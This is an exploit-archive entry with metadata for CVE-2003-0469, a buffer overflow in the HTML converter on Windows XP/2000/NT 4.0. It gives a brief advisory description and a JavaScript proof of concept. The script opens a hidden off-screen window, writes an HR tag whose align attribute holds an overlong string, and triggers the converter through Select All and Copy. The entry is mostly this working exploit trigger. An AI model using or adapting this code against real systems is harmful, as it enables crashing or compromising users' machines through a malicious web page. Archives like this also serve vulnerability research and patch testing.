Microsoft Windows XP/2000/NT 4.0 - HTML Converter HR Align Buffer Overflow

Author: Digital Scream
type: remote
platform: windows
port: 
date_added: 2003-06-23 
date_updated: 2012-11-19 
verified: 1 
codes: CVE-2003-0469;OSVDB-2963 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/8016/info

Microsoft Windows platforms are prone to a boundary condition error in the HTML converter. If the 'Align' attribute of the 'HR' tag is given an excessively large value, an internal buffer will be overrun. This issue can be exploited via applications which use the HTML converter (such as Internet Explorer) and will permit arbitrary code to be executed on a vulnerable system.

<script>
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i<=127;i++)buffer+="X";
buffer+="DigitalScream";
WndDoc.write("<HR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
</script>